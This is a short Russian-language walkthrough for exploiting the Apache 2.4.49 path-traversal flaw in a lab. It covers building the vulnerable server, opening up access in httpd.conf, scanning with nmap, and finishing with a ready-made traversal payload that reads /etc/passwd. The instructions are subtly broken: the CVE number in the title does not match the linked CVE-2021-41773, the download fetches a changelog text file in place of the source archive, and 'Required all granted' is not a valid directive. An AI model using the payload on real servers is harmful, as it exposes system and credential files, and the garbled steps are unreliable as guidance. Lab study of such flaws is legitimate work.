
это практический пример того, как эксплуатировать уязвимость CVE-2021-4773 с помощью виртуальной машины
это практический пример эксплуатации уязвимости CVE-2021-4773 с помощью виртуальной машины
для этого руководства вам понадобится следующее
итак, начнем Когда у вас будут запущены 2 виртуальные машины, вы установите Apache версии 2.4.49 из архивного репозитория вы можете найти эту версию https://archive.apache.org/dist/httpd/CHANGES_2.4.49
1 Первым делом на вашей серверной виртуальной машине выполните следующую команду
curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2 or wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2
2 Затем вам нужно распаковать эту версию Apache, как показано ниже
tar -xvjf httpd-2.4.49.tar.bz2
3 Установите следующие пакеты
sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev
4 Запустите исполняемый файл в главном каталоге (файл с именем configure), используйте флаг для указания каталога установки
./configure --prefix=/usr/local/apache2
5 Скомпилируйте уязвимую версию
make
6 Установите уязвимую версию
make install
7 Проверьте версию
ls /usr/local/apache2
8 Запустите процесс
/usr/local/apache2/bin/apachectl start
9 Проверьте процесс
ps aux | grep httpd
10 Настройте уязвимость Найдите файл /usr/local/apache2/conf/httpd.conf и настройте каталог admin Найдите тег Directory и измените Require all denied на
Required all granted
Найдите тег Files .ht* и измените Require all denied на
Required all granted
Первое изменение предназначено для эксплуатации уязвимости в локальной среде, а второе — для раскрытия в реальной среде
1 Просканируйте IP-адрес с помощью nmap с помощью следующей команды
nmap -sV ip_address
2 Выполните curl или wget для проверки сервера Apache
curl ip_address or make wget ip_address
3 Изучите, как эксплуатировать уязвимость, на следующей странице, если хотите понять синтаксис
https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability
или просто используйте следующий пэйлоад
http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd